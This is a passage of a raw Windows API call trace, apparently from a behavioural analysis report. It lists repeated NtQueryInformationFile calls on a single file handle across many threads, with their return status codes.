out: IoStatusBlock=0x35dfb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1284 os_tid = 0x884 [0164.123] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9a8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1285 os_tid = 0x5d4 [0164.125] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa98, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1286 os_tid = 0x340 [0164.127] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd30, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1287 os_tid = 0x810 [0164.129] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff48, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1288 os_tid = 0x830 [0164.131] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8a0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1289 os_tid = 0x880 [0164.133] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1290 os_tid = 0xae4 [0164.135] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f808, FileInformation=0x210e20) returned 0x0 Thread: id = 1291 os_tid = 0x570 [0164.137] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc88, FileInformation=0x210e20) returned 0x0 Thread: id = 1292 os_tid = 0xb40 [0164.139] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fce0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fce0, FileInformation=0x210e20) returned 0x0 Thread: id = 1293 os_tid = 0x5f4 [0164.141] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc70, FileInformation=0x210e20) returned 0x0 Thread: id = 1294 os_tid = 0xbb8 [0164.143] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb38, FileInformation=0x210e20) returned 0x0 Thread: id = 1295 os_tid = 0x598 [0164.145] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa88, FileInformation=0x210e20) returned 0x0 Thread: id = 1296 os_tid = 0x4e4 [0164.147] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1297 os_tid = 0xbfc [0164.149] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd70, FileInformation=0x210e20) returned 0x0 Thread: id = 1298 os_tid = 0x80c [0164.150] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd38, FileInformation=0x210e20) returned 0x0 Thread: id = 1299 os_tid = 0xbf8 [0164.152] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd10, FileInformation=0x210e20) returned 0x0 Thread: id = 1300 os_tid = 0x524 [0164.155] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa98, FileInformation=0x210e20) returned 0x0 Thread: id = 1301 os_tid = 0x674 [0164.156] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f960, FileInformation=0x210e20) returned 0x0 Thread: id = 1302 os_tid = 0x4a0 [0164.158] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf928, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf928, FileInformation=0x210e20) returned 0x0 Thread: id = 1303 os_tid = 0x5d8 [0164.160] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375faf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375faf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1304 os_tid = 0x69c [0164.162] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df890, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df890, FileInformation=0x210e20) returned 0x0 Thread: id = 1305 os_tid = 0x6a8 [0164.164] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1306 os_tid = 0x500 [0164.166] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1307 os_tid = 0x4e0 [0164.167] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1308 os_tid = 0x330 [0164.169] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1309 os_tid = 0xa30 [0164.171] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1310 os_tid = 0xb50 [0164.173] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc48, FileInformation=0x210e20) returned 0x0 Thread: id = 1311 os_tid = 0xb70 [0164.176] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff08, FileInformation=0x210e20) returned 0x0 Thread: id = 1312 os_tid = 0xb6c [0164.181] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1313 os_tid = 0xb74 [0164.188] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fad8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1314 os_tid = 0xb68 [0164.190] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbd0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1315 os_tid = 0x758 [0164.194] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fee0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fee0, FileInformation=0x210e20) returned 0x0 Thread: id = 1316 os_tid = 0x3d4 [0164.198] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1317 os_tid = 0x484 [0164.201] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc48, FileInformation=0x210e20) returned 0x0 Thread: id = 1318 os_tid = 0xb4c [0164.204] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb68, FileInformation=0x210e20) returned 0x0 Thread: id = 1319 os_tid = 0xa1c [0164.207] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc10, FileInformation=0x210e20) returned 0x0 Thread: id = 1320 os_tid = 0x2ac [0164.210] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa00, FileInformation=0x210e20) returned 0x0 Thread: id = 1321 os_tid = 0xa8c [0164.212] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1322 os_tid = 0x68c [0164.361] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1323 os_tid = 0x388 [0164.366] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb28, FileInformation=0x210e20) returned 0x0 Thread: id = 1324 os_tid = 0xa50 [0164.371] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf940, FileInformation=0x210e20) returned 0x0 Thread: id = 1325 os_tid = 0x75c [0164.375] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe38, FileInformation=0x210e20) returned 0x0 Thread: id = 1326 os_tid = 0x240 [0164.377] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfee0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfee0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1327 os_tid = 0x320 [0164.381] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbf8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1328 os_tid = 0x3b4 [0164.385] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f858, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1329 os_tid = 0x760 [0164.390] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36fff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36fff50, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1330 os_tid = 0xb00 [0164.392] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe50, FileInformation=0x210e20) returned 0x0 Thread: id = 1331 os_tid = 0x7fc [0164.395] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc10, FileInformation=0x210e20) returned 0x0 Thread: id = 1332 os_tid = 0xb18 [0164.397] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa90, FileInformation=0x210e20) returned 0x0 Thread: id = 1333 os_tid = 0xa68 [0164.399] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f798, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f798, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1334 os_tid = 0x224 [0164.401] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 1335 os_tid = 0x2c4 [0164.403] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1336 os_tid = 0x24c [0164.405] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1337 os_tid = 0x4e8 [0164.407] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff868, FileInformation=0x210e20) returned 0x0 Thread: id = 1338 os_tid = 0x220 [0164.409] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd20, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1339 os_tid = 0xb04 [0164.411] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f888, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1340 os_tid = 0x180 [0164.412] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fbe0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fbe0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1341 os_tid = 0x53c [0164.419] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb00, FileInformation=0x210e20) returned 0x0 Thread: id = 1342 os_tid = 0x5b4 [0164.421] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f800, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f800, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1343 os_tid = 0x614 [0164.423] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb00, FileInformation=0x210e20) returned 0x0 Thread: id = 1344 os_tid = 0x690 [0164.425] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7b0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1345 os_tid = 0x440 [0164.427] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fbe8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1346 os_tid = 0x7d8 [0164.433] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcd0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1347 os_tid = 0xa60 [0164.435] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa10, FileInformation=0x210e20) returned 0x0 Thread: id = 1348 os_tid = 0xb24 [0164.437] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f950, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1349 os_tid = 0x878 [0164.439] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff60, FileInformation=0x210e20) returned 0x0 Thread: id = 1350 os_tid = 0xb1c [0164.441] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f970, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f970, FileInformation=0x210e20) returned 0x0 Thread: id = 1351 os_tid = 0xb08 [0164.443] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf910, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf910, FileInformation=0x210e20) returned 0x0 Thread: id = 1352 os_tid = 0x4fc [0164.446] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369faa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369faa8, FileInformation=0x210e20) returned 0x0 Thread: id = 1353 os_tid = 0x4dc [0164.448] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd70, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1354 os_tid = 0x43c [0164.450] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc28, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1355 os_tid = 0x1c4 [0164.453] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd78, FileInformation=0x210e20) returned 0x0 Thread: id = 1356 os_tid = 0xbec [0164.455] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff9e0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1357 os_tid = 0xb48 [0164.457] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff8e0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1358 os_tid = 0x5bc [0164.459] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe68, FileInformation=0x210e20) returned 0x0 Thread: id = 1359 os_tid = 0x6b8 [0164.461] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc60, FileInformation=0x210e20) returned 0x0 Thread: id = 1360 os_tid = 0x2dc [0164.463] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365faa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365faa0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1361 os_tid = 0x158 [0164.465] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa50, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1362 os_tid = 0x6cc [0164.467] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcc0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1363 os_tid = 0x694 [0164.469] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fda0, FileInformation=0x210e20) returned 0xc00000bb Thread: id = 1364 os_tid = 0x6d8 [0164.471] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcb8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1365 os_tid = 0x87c [0164.473] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbe8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1366 os_tid = 0xb88 [0164.475] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff50, FileInformation=0x210e20) returned 0x0 Thread: id = 1367 os_tid = 0xb8c [0164.477] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff880, FileInformation=0x210e20) returned 0x0 Thread: id = 1368 os_tid = 0x700 [0164.479] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc98, FileInformation=0x210e20) returned 0x0 Thread: id = 1369 os_tid = 0x6f0 [0164.481] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1370 os_tid = 0x130 [0164.483] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffed0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffed0, FileInformation=0x210e20) returned 0x0 Thread: id = 1371 os_tid = 0x754 [0164.485] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f8e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1372 os_tid = 0x72c [0164.487] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd98, FileInformation=0x210e20) returned 0x0 Thread: id = 1373 os_tid = 0x748 [0164.489] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb30, FileInformation=0x210e20) returned 0x0 Thread: id = 1374 os_tid = 0x928 [0164.491] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb50, FileInformation=0x210e20) returned 0x0 Thread: id = 1375 os_tid = 0xcc [0164.493] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fda0, FileInformation=0x210e20) returned 0x0 Thread: id = 1376 os_tid = 0xd0 [0164.495] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fba8, FileInformation=0x210e20) returned 0x0 Thread: id = 1377 os_tid = 0xd4 [0164.497] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1378 os_tid = 0xd8 [0164.499] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fdb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fdb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1379 os_tid = 0xdc [0164.501] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfee8, FileInformation=0x210e20) returned 0x0 Thread: id = 1380 os_tid = 0xe0 [0164.503] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fab8, FileInformation=0x210e20) returned 0x0 Thread: id = 1381 os_tid = 0xe4 [0164.505] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fbc8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1382 os_tid = 0xe8 [0164.511] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffdc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffdc8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1383 os_tid = 0xec [0164.513] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1384 os_tid = 0x9d8 [0164.515] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe98, FileInformation=0x210e20) returned 0x0 Thread: id = 1385 os_tid = 0x898 [0164.517] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc50, FileInformation=0x210e20) returned 0x0 Thread: id = 1386 os_tid = 0x48c [0164.519] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc88, FileInformation=0x210e20) returned 0x0 Thread: id = 1387 os_tid = 0x6a4 [0164.521] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1388 os_tid = 0x20c [0164.523] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f948, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1389 os_tid = 0x630 [0164.525] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f810, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f810, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1390 os_tid = 0x5e4 [0164.527] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa10, FileInformation=0x210e20) returned 0x0 Thread: id = 1391 os_tid = 0xb28 [0164.529] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1392 os_tid = 0xb20 [0164.531] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fb48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: 